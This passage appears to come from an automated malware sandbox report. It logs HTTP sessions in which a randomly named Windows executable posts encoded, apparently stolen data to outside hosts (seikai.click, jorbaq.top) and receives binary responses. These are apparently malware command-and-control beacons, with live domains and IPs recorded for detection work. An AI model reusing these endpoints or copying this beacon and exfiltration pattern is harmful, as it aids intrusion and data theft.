                                                                        Nov 7, 2024 10:11:56.039875984 CET1236INData Raw: e2 29 7f 04 c8 f6 d4 ca 2e 40 e2 a7 8a 1e a0 07 a4 46 21 82 76 90 3a 95 00 5d a6 05 e4 bb af bc 4d 8d 06 8a 6c 4f fc bd 2d 1e 03 b4 8e b4 df fd 75 91 b4 57 7f 0d 25 ed d5 57 6f 91 a7 84 a6 e2 7c 7e 28 92 be 12 9b 80 0a e4 3a ea 80 96 11 ff 36 f0
                                                                        Data Ascii: ).@F!v:]MlO-uW%Wo|~(:6{tzIltGF?wS]MofJ%~"viK^|"{{Q^7W=qx8#{^:]h<qj@1]9%=58ys>/W
                                                                        Nov 7, 2024 10:11:56.039885998 CET424INData Raw: b0 8d 66 2e 00 45 88 60 b2 cf f5 55 10 37 dc 44 f1 09 3a 2b 88 65 62 9d 11 cb 5e cf cd 82 28 89 f8 26 74 65 4a 4b 33 b9 4b 49 20 0f 33 12 e2 87 3a 2d e8 87 c4 39 24 0e c8 1c 75 33 0e 8d 2d a5 11 b7 03 e7 70 83 52 ca 78 e6 2b d7 c8 27 cc c4 15 fc
                                                                        Data Ascii: f.E`U7D:+eb^(&teJK3KI 3:-9$u3-pRx+'X2p"'6){)]rv|[MEKcSXY-rrt|Fq0?RN2_~jzOE5E]PrxS=4=}$/tF/c
                                                                        Nov 7, 2024 10:11:56.043905973 CET1236INData Raw: 4b 5d b5 06 e7 a7 b2 ac 21 14 93 f4 8e f4 c7 c6 e0 03 80 2b 73 e0 84 9a 5c 6c 65 c4 7d f2 de cb e8 af 16 d8 be db c8 34 4f f1 d9 96 c0 78 38 d6 d0 6e 18 22 c5 12 cb ec a4 14 72 5c c9 9b 52 14 51 fb 25 0e 9f 74 dd fb 7e 71 f0 8a 5f e0 ab 2f fe 06
                                                                        Data Ascii: K]!+s\le}4Ox8n"r\RQ%t~q_/~g_~/W_}n1]~noz{[O@dMmoj{W7_) Ob/Y^_>@E


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.550003183.90.181.102802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:57.554179907 CET1643OUTPOST /c52l/ HTTP/1.1
                                                                        Host: www.seikai.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.seikai.click
                                                                        Referer: http://www.seikai.click/c52l/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 50 61 47 53 52 6f 61 34 33 63 2b 4d 34 30 48 6f 6a 2f 65 44 35 6f 4a 31 75 43 4d 41 78 72 41 44 48 32 41 77 6a 43 75 49 46 41 45 65 6e 7a 49 63 58 63 7a 46 77 65 61 66 76 47 4d 36 58 4b 72 34 73 58 74 35 72 46 70 7a 4e 76 52 49 47 48 49 70 54 57 57 4e 6e 6d 52 54 67 45 53 71 74 49 33 34 4f 38 43 64 78 61 6a 73 75 30 53 2f 44 36 65 69 63 61 6d 35 6e 5a 63 6d 4d 62 55 5a 6e 75 51 41 6a 48 32 46 61 5a 62 47 53 52 36 4e 70 59 62 7a 77 38 55 56 62 72 68 4f 6f 4a 4e 4d 32 67 35 45 50 75 4b 52 46 46 46 77 76 4b 5a 41 6d 4a 78 38 71 38 72 36 33 39 42 6c 51 39 7a 31 4a 56 79 5a 32 50 6c 56 71 63 35 55 45 32 51 66 74 77 64 4b 75 2f 55 32 51 7a 73 44 32 4d 4b 75 42 48 30 33 51 51 78 64 49 4f 6b 74 5a 71 2f 76 6a 4f 73 2f 31 44 6a 6c 57 6b 34 36 6d 64 76 69 75 6b 43 4f 78 52 66 4b 35 4b 69 36 6d 6c 33 42 58 37 56 79 4d 67 5a 52 6f 70 47 73 4b 51 74 37 76 57 7a 62 66 55 38 4b 42 55 6f 31 48 66 6d 52 39 73 67 62 44 63 4f 53 42 58 67 59 63 55 47 69 46 37 6f 67 6a 49 52 32 62 47 6f 37 48 4f [TRUNCATED]
                                                                        Data Ascii: N6gPj2W=PaGSRoa43c+M40Hoj/eD5oJ1uCMAxrADH2AwjCuIFAEenzIcXczFweafvGM6XKr4sXt5rFpzNvRIGHIpTWWNnmRTgESqtI34O8Cdxajsu0S/D6eicam5nZcmMbUZnuQAjH2FaZbGSR6NpYbzw8UVbrhOoJNM2g5EPuKRFFFwvKZAmJx8q8r639BlQ9z1JVyZ2PlVqc5UE2QftwdKu/U2QzsD2MKuBH03QQxdIOktZq/vjOs/1DjlWk46mdviukCOxRfK5Ki6ml3BX7VyMgZRopGsKQt7vWzbfU8KBUo1HfmR9sgbDcOSBXgYcUGiF7ogjIR2bGo7HOOAZVEVcMA4BGrxWPRT9aQRWzPkQsPbpNlm5W15hqnlKrGPjMRyA2c9eA+bnlzk5Cu1Dx623NX9OV2ekOEv5rB1py+QpNTze+blV2HFbQ2STRRskS5C3PHBTFKuAhkWH4Q3GGc4nlvyG6B60lrWRx+E/CRKqg6TR+0pPFjJ3xtTRXgFyZF/e3n9R4RkdJKg3lFIdPAjnTKUWLy1VTEwdMgngSakWcO12L5BIQ9HC7MRv6icNhcl2yY0DdP6nEXobu1LKidZrAqIesKg/kEoUnqhx6qlaLGhGVayoZWMBoP6bT3g1Qo728uKoOppkxTwV+DjuuZc8TjxDCckW2SmYfQZCZTYnesgaS3EBGutWpTBfBRQXoA/pi4zBLzbiIWlFDOetzXg47Ts3+4cHX0upCJJbbZGh54hBJJpNsaJsQGwDd7hs/JYSZvRpUIboeokyeWQ5L+Kco5XNydGq5qqrLwf8Ouw3xmTQ1gVH9tYpfgEiaay6Wppy11JnbExiqag4Jnn0unmPq3uvbYO+vapyJsrVPrRB1eoSt0NnM3r75w3Qz2zDUtNHb8ggrC3bqrwttpmcSYwiQsuJ/gdR24LPIc7dk+5QS79M7H/IKZXrYTEiWzg6b2u6NQs227v+XtnCAN/myTD8BsD5djAq//OzMyzyCDIJ0iRGWrF [TRUNCATED]
                                                                        Nov 7, 2024 10:11:58.649674892 CET1236INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        content-type: text/html; charset=UTF-8
                                                                        wpo-cache-status: not cached
                                                                        wpo-cache-message: The request method was not GET (POST)
                                                                        link: <http://seikai.click/wp-json/>; rel="https://api.w.org/"
                                                                        transfer-encoding: chunked
                                                                        content-encoding: br
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 07 Nov 2024 09:11:58 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 34 62 62 65 0d 0a d4 03 17 8a 0c 98 b4 da 1f 12 51 55 fb 61 65 06 60 4d ea 01 50 b5 48 c8 bc 60 f5 c7 af 3f ff fc f7 97 81 b1 3b 20 96 ed b8 9e ef 3f 33 b5 fe 1c 55 e5 70 7f 46 b7 2d d2 01 41 90 94 64 9b 0a 9d ec bd ec 71 92 fe 3d b6 2b 05 93 8f 14 6c 10 e0 00 d0 16 85 55 df f6 5f b7 e5 76 d0 6c ff ab 5a 56 cf 34 d5 7f a6 83 b0 0b 70 f1 11 98 e4 9c f7 5c 65 90 00 29 78 48 82 07 92 23 ca 7a 72 aa 2e b5 57 c7 fc fa d4 15 8e 9d 2f 55 fd af fe d7 54 37 6c 5c 79 86 00 18 1b 36 dd 4d 9f bb 90 aa ab 4c 40 21 3e 2a db 0a 99 56 a6 24 9b b2 4d 25 bb 2b 96 00 c8 ff 6b ce ff 35 6c 56 f7 cf 2f e4 15 41 46 4d 3a bf d7 5d 27 71 a2 a4 80 47 f9 a5 0b a6 56 4c 37 a5 96 dd 62 1c 66 bc 54 2d 6b aa a9 f6 f7 03 80 21 8e 47 d9 59 7c 7c 88 79 45 2c 25 78 c0 60 00 d2 44 3a a4 e9 73 d3 b9 77 57 7b fe 68 f9 da c7 7f 88 70 e9 1d 20 91 a5 e8 2f ed a2 4b 2c a0 88 22 fb a8 42 83 79 01 c8 96 c0 53 00 4f d2 0f 92 65 20 59 02 4e d5 d5 61 e6 cd 7b 92 9f 25 7b 95 6c 7f 39 6e 48 92 2d 67 f9 92 bc de 1f b2 bd 97 d9 ed 11 14 37 84 4c 2f [TRUNCATED]
                                                                        Data Ascii: 4bbeQUae`MPH`?; ?3UpF-Adq=+lU_vlZV4p\e)xH#zr.W/UT7l\y6ML@!>*V$M%+k5lV/AFM:]'qGVL7bfT-k!GY||yE,%x`D:swW{hp /K,"BySOe YNa{%{l9nH-g7L/.e?<?@OgM.WfFz/cXx>fGu+T*]Xn-<jvQD<j&cCfWk!bL0~:"Acc4Bbz26h8gUW]ZKq=}AvP)BYw\),yqPwRm<_d'=t`:/[+XJ?U1y8y""!D0syp~4,:GMQTRU{K/c'Q)omog{O?m{{?^!W\J\r~aAc]:y[
                                                                        Nov 7, 2024 10:11:58.649719954 CET212INData Raw: e4 ca 19 b6 22 3a 35 fe 10 39 de 90 87 65 1e 59 79 92 13 32 62 b4 9d 98 b1 0d a1 e4 61 ec fb 9f 9f 6e c8 43 bf ee 90 e4 e4 6b bc 38 91 1e 09 25 0f 65 95 f6 2a 79 1c 3b 94 57 42 b2 ae 0e 3a e3 f7 ae 58 b3 2a 84 92 b9 55 11 2b 84 92 32 7e 91 9c 7c
                                                                        Data Ascii: ":59eYy2banCk8%e*y;WB:X*U+2~|eBI*&y?|YOmq{'?kBw%'HOm~Tb"(6HWx]i_vJx$Wl
                                                                        Nov 7, 2024 10:11:58.649755955 CET1236INData Raw: 7a 6f 7c 2b df 78 b4 ed 1b e7 ad d4 4d 4f 7a 4a be 3d 47 bb 8e a4 ee e6 99 14 bf 64 93 7b 7b 2d d4 1c 4f 3a 2c 65 5d e9 7d 84 92 51 ed 7e 89 17 f8 ed b9 b4 58 91 dc db 39 ee 28 7c 4e 6b 47 7e bb 91 be 3f a7 44 6a 05 74 1e 92 93 4b 41 7a 5a 6e 4b
                                                                        Data Ascii: zo|+xMOzJ=Gd{{-O:,e]}Q~X9(|NkG~?DjtKAzZnK{?7pGhK,=AXx=.k2rqQWZ;Qr%u^;c):K!LJOI&AI1}Ex{c0mYwuI+*va
                                                                        Nov 7, 2024 10:11:58.649944067 CET1236INData Raw: 58 7b a4 81 62 bd 38 34 57 aa 0f 10 5e cd 1d 1d 6e 64 1d 48 d2 8c 7b 7b 52 a6 09 8b 47 c4 5d 5e bd f8 74 6f ef d5 8b 4f 39 10 5b 08 b0 c3 09 f6 56 8f 95 b9 08 49 fe e5 49 67 9c ff 0c 9d 13 0d 06 e4 5e cd 2e 27 bb a8 20 bc 47 02 72 ef d4 12 2f 75
                                                                        Data Ascii: X{b84W^ndH{{RG]^toO9[VIIg^.' Gr/u!k]k9gFP#a8%X;O2DCr-dD%+^w_Y}"h`)]~)h[ >ac|2E8:]Qnn 5`(t+Of}b{{0T
                                                                        Nov 7, 2024 10:11:58.649951935 CET1236INData Raw: 49 ed ba f8 d2 21 bc 27 db 3c 13 fe cc 83 88 4a d1 e5 da f8 20 5f a1 9f 27 13 e6 b5 b4 ce 47 0a bd 47 bb 99 31 cb ad 14 d6 7e fa b1 f5 90 8d b0 0d 1b f1 6b 85 f9 c0 73 f0 c9 5a 1d 9f f9 09 e7 2d 91 1e 36 39 f4 d1 bf 58 ce f8 18 5b 60 09 b6 c0 81
                                                                        Data Ascii: I!'<J _'GG1~ksZ-69X[`ry6]S+ly#RPi()(6>%3T5'iarN>og9"{6{lK%[MVEqPJ4zX;L2y28m[MGj
                                                                        Nov 7, 2024 10:11:58.649969101 CET636INData Raw: 9d 2b 15 c3 98 ea 69 93 6e f8 32 71 cc 15 a6 cc 3b 1f f6 22 7b 41 68 46 72 8c c6 b4 99 31 1b 5b 6f 85 19 57 9c 80 3b 1f d6 ce 55 4a 4c 1b 46 b4 b2 8e ba 75 f1 c4 7a 25 f2 0e ba 68 4e ec 98 93 b9 e7 8d b7 5f 25 ce 39 2c 27 c7 9a 78 f3 b4 ca 12 25
                                                                        Data Ascii: +in2q;"{AhFr1[oW;UJLFuz%hN_%9,'x%JCOwa[EFSc]4UGg"KChJ$eZ;u>DJS4Q..YsbkLcXck4]e.4rxz1K|
                                                                        Nov 7, 2024 10:11:58.650259972 CET1236INData Raw: e3 61 59 c2 84 01 6a 92 7a c6 1d 31 ce a8 aa a8 2b ed 89 b1 82 d1 5b fb 04 43 78 8c 4f 60 b7 48 43 8c 90 0b 2e 61 0a 1d 97 7b 1a 0e dc 11 83 06 e2 93 86 66 8a 6b ee 69 1f fe 4b d5 0f dd bb b3 e9 87 ee 3c 76 9c d8 6c c7 83 66 ef 13 5f 5f 2a ac e3
                                                                        Data Ascii: aYjz1+[CxO`HC.a{fkiK<vlf__*ZT@<^onND,fxv[)7V]yIZvqL)Rf8aG5cW]\sd|H*{DLV |c0W0{B=T ?
                                                                        Nov 7, 2024 10:11:58.650270939 CET1236INData Raw: 2c f7 4e e1 d9 18 bc 85 fb 2e fa 16 a2 42 e1 fe 41 07 70 c7 58 78 33 06 0a 33 0c a2 87 b9 72 09 1c cb a5 42 e1 3e 0f a6 7f e7 a5 6d a7 74 ff 34 d4 a1 2f fe e4 a8 7a 35 c6 04 af 60 f0 e3 0e cb ce 41 dd 1e 09 fc fb 25 97 b3 46 e5 f2 7e 95 28 cc 6d
                                                                        Data Ascii: ,N.BApXx33rB>mt4/z5`A%F~(mZ?|mW SY45-x:!%dnjhWMj9mpvIMV)kE$[)+4/D?Sd?<24mn{a#w
                                                                        Nov 7, 2024 10:11:58.650285006 CET1236INData Raw: 1f 48 07 4d c7 a6 bc 79 01 53 50 67 4e 54 d3 b8 29 68 28 68 49 fd ca 3b 2e ba 7a d3 08 69 15 dc 02 a3 34 31 25 a1 5f fb 88 0a ad a5 f4 6b 77 ec c3 17 0b 18 8d bc 5c 2d 19 6c 55 27 df b0 08 a2 d2 07 65 aa c4 e3 4c 4c f4 28 23 dd 26 df 60 71 12 ef
                                                                        Data Ascii: HMySPgNT)h(hI;.zi41%_kw\-lU'eLL(#&`q(|DMDXa'Zz"MxtsPn_mT7XewDSDHK6P*#[]5\tAr[G1=Q-SVP{5<W).@F!v:]
                                                                        Nov 7, 2024 10:11:58.650294065 CET1236INData Raw: 36 21 ba b2 a0 a9 bb b0 77 bc 08 62 3d ba 09 e3 62 fc 28 96 16 8c 8e cd 7d a3 21 1c 4f c1 75 7c 39 2c 7c 7f 41 dd 1f b8 8b 6c 42 2a 50 25 46 c2 4e c4 d8 05 01 8d 26 1c ac 01 19 82 02 b2 1e ce cd 24 54 2c 8a f0 1c b5 56 56 f6 6d ce 7c a5 c2 67 44
                                                                        Data Ascii: 6!wb=b(}!Ou|9,|AlB*P%FN&$T,VVm|gDrBekzHbEw8&CPhh-m,xS`d9!*5@~#o<fbWWh8KT*!@ ZIt%d q6lf.E`U7D:+eb^(
                                                                        Nov 7, 2024 10:11:58.654813051 CET1236INData Raw: b3 ee 81 75 15 26 db 22 01 3e 69 a3 d5 5d ef 6b 63 ab 2f 2d 3a 07 13 d8 94 90 ae ba 13 45 30 a9 ef 82 93 e3 82 5d 0f 9e cc 9d 37 2d 3c 39 39 f1 22 b6 cf c7 27 c6 eb 51 72 3c b8 3b b8 fc 6a 8e 76 0d 4c f7 0b 1b 1d bc 1f c2 e6 ee 00 00 20 8e e1 e4
                                                                        Data Ascii: u&">i]kc/-:E0]7-<99"'Qr<;jvL P9zC6!NAKZe@7gzw1<*Zc 2o`WXG =B*AKUV;/[}mpd;V:z?!6RGB8%Tw+o


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.550004183.90.181.102802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:00.099173069 CET355OUTGET /c52l/?N6gPj2W=CYuySeqU886kxlWyyNa/wcd36R1F3r0dFV8i/RXeMxM6gRw3d8zll6e6+mgIULDdoE9y629/Yed0CV4AMnOIzXEmhgnpyaCJF/2Tl+LMvC2Uf6a/XdOYn+kCA+BMl9RbhA==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.seikai.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:12:01.101988077 CET633INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        content-type: text/html; charset=UTF-8
                                                                        wpo-cache-status: not cached
                                                                        wpo-cache-message: In the settings, caching is disabled for matches for one of the current request's GET parameters
                                                                        x-redirect-by: WordPress
                                                                        location: http://seikai.click/c52l/?N6gPj2W=CYuySeqU886kxlWyyNa/wcd36R1F3r0dFV8i/RXeMxM6gRw3d8zll6e6+mgIULDdoE9y629/Yed0CV4AMnOIzXEmhgnpyaCJF/2Tl+LMvC2Uf6a/XdOYn+kCA+BMl9RbhA==&yx-=dF9dYX9pQR-xIhFp
                                                                        content-length: 0
                                                                        date: Thu, 07 Nov 2024 09:12:00 GMT
                                                                        server: LiteSpeed


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.2.55000567.223.117.142802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:06.677499056 CET600OUTPOST /saaz/ HTTP/1.1
                                                                        Host: www.jorbaq.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.jorbaq.top
                                                                        Referer: http://www.jorbaq.top/saaz/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 4a 33 2f 42 6d 68 39 43 4c 55 61 2f 41 62 64 56 35 50 45 65 36 72 49 74 6b 69 6a 6c 59 79 30 75 71 59 4d 43 79 59 78 78 42 37 4a 2b 58 2f 74 74 69 70 54 53 56 53 4d 4f 74 70 31 72 62 38 51 5a 46 63 39 4c 61 31 51 4f 41 47 4f 50 65 48 38 47 7a 4a 35 6f 6b 4e 76 66 6a 2f 67 39 63 62 55 72 33 44 5a 6c 78 57 74 4b 35 56 65 6b 4b 43 69 43 37 6f 4a 34 42 57 53 4b 56 33 75 6b 66 5a 4a 6b 62 66 73 70 6e 4d 31 55 75 76 68 68 36 37 7a 77 41 48 30 4c 58 2b 6d 37 6b 64 48 61 61 5a 69 6e 49 6f 6d 54 77 76 62 66 7a 76 34 46 6b 73 47 52 61 66 36 44 6a 6f 79 41 52 44 36 64 63 4b 38 31 79 76 53 67 38 62 4d 3d
                                                                        Data Ascii: N6gPj2W=J3/Bmh9CLUa/AbdV5PEe6rItkijlYy0uqYMCyYxxB7J+X/ttipTSVSMOtp1rb8QZFc9La1QOAGOPeH8GzJ5okNvfj/g9cbUr3DZlxWtK5VekKCiC7oJ4BWSKV3ukfZJkbfspnM1Uuvhh67zwAH0LX+m7kdHaaZinIomTwvbfzv4FksGRaf6DjoyARD6dcK81yvSg8bM=
                                                                        Nov 7, 2024 10:12:07.339900017 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:07 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        26192.168.2.55000667.223.117.142802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:09.226202965 CET620OUTPOST /saaz/ HTTP/1.1
                                                                        Host: www.jorbaq.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.jorbaq.top
                                                                        Referer: http://www.jorbaq.top/saaz/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 4a 33 2f 42 6d 68 39 43 4c 55 61 2f 52 4b 4e 56 30 4d 73 65 76 62 49 75 34 79 6a 6c 52 53 30 71 71 59 49 43 79 5a 30 71 47 4a 74 2b 57 65 64 74 34 72 72 53 53 53 4d 4f 69 4a 31 79 66 38 51 6f 46 63 68 74 61 78 51 4f 41 47 61 50 65 48 73 47 7a 2b 6c 70 69 64 76 64 34 50 67 6a 59 62 55 72 33 44 5a 6c 78 57 35 67 35 56 47 6b 4a 79 79 43 71 38 56 2f 50 32 53 4c 46 48 75 6b 4f 70 4a 67 62 66 74 4f 6e 4f 4d 7a 75 73 4a 68 36 37 6a 77 46 47 30 45 4d 4f 6d 39 70 39 47 49 66 71 54 74 45 4c 43 4f 2f 4d 4f 73 69 73 38 61 73 36 33 37 41 39 79 72 77 49 65 34 42 51 79 71 4e 36 64 63 6f 4d 43 51 69 4d 62 59 39 50 7a 78 6e 53 2b 4b 55 46 56 4b 6b 48 4a 6e 33 5a 64 37
                                                                        Data Ascii: N6gPj2W=J3/Bmh9CLUa/RKNV0MsevbIu4yjlRS0qqYICyZ0qGJt+Wedt4rrSSSMOiJ1yf8QoFchtaxQOAGaPeHsGz+lpidvd4PgjYbUr3DZlxW5g5VGkJyyCq8V/P2SLFHukOpJgbftOnOMzusJh67jwFG0EMOm9p9GIfqTtELCO/MOsis8as637A9yrwIe4BQyqN6dcoMCQiMbY9PzxnS+KUFVKkHJn3Zd7
                                                                        Nov 7, 2024 10:12:09.891572952 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 09:12:09 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.2.55000767.223.117.142802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:12:11.773761034 CET1637OUTPOST /saaz/ HTTP/1.1
                                                                        Host: www.jorbaq.top
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.jorbaq.top
                                                                        Referer: http://www.jorbaq.top/saaz/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 4a 33 2f 42 6d 68 39 43 4c 55 61 2f 52 4b 4e 56 30 4d 73 65 76 62 49 75 34 79 6a 6c 52 53 30 71 71 59 49 43 79 5a 30 71 47 4a 6c 2b 58 73 56 74 37 4b 72 53 54 53 4d 4f 38 35 31 76 66 38 51 31 46 63 70 70 61 78 56 35 41 46 69 50 4d 31 55 47 78 4d 4e 70 73 64 76 64 77 76 67 2b 63 62 55 45 33 44 70 68 78 57 70 67 35 56 47 6b 4a 77 61 43 71 6f 4a 2f 4e 32 53 4b 56 33 75 67 66 5a 49 48 62 66 31 30 6e 4f 49 4a 75 38 70 68 35 66 2f 77 43 6b 63 45 41 4f 6d 2f 6e 64 48 4e 66 71 66 75 45 4c 75 43 2f 50 53 47 69 73 30 61 2f 4d 72 6b 62 65 57 45 6b 66 76 62 50 79 65 49 4d 2b 45 38 6e 76 43 6a 2b 73 37 6d 68 37 37 4b 6b 6d 54 53 53 6b 63 52 35 68 78 49 2b 4d 73 6e 6b 47 5a 52 6e 56 68 66 6f 65 75 71 61 30 71 55 69 2b 72 31 79 64 74 55 68 48 59 47 47 69 64 56 62 59 78 4c 68 39 54 6c 67 45 30 44 2b 49 51 31 56 78 6d 4c 79 69 36 4f 58 6c 46 59 43 64 4f 42 75 74 70 35 38 63 79 69 46 6d 51 6e 71 37 4c 48 51 61 76 56 53 47 4b 4a 75 76 78 75 38 35 52 34 74 74 68 4d 4a 4e 30 72 31 72 66 55 4c 72 [TRUNCATED]
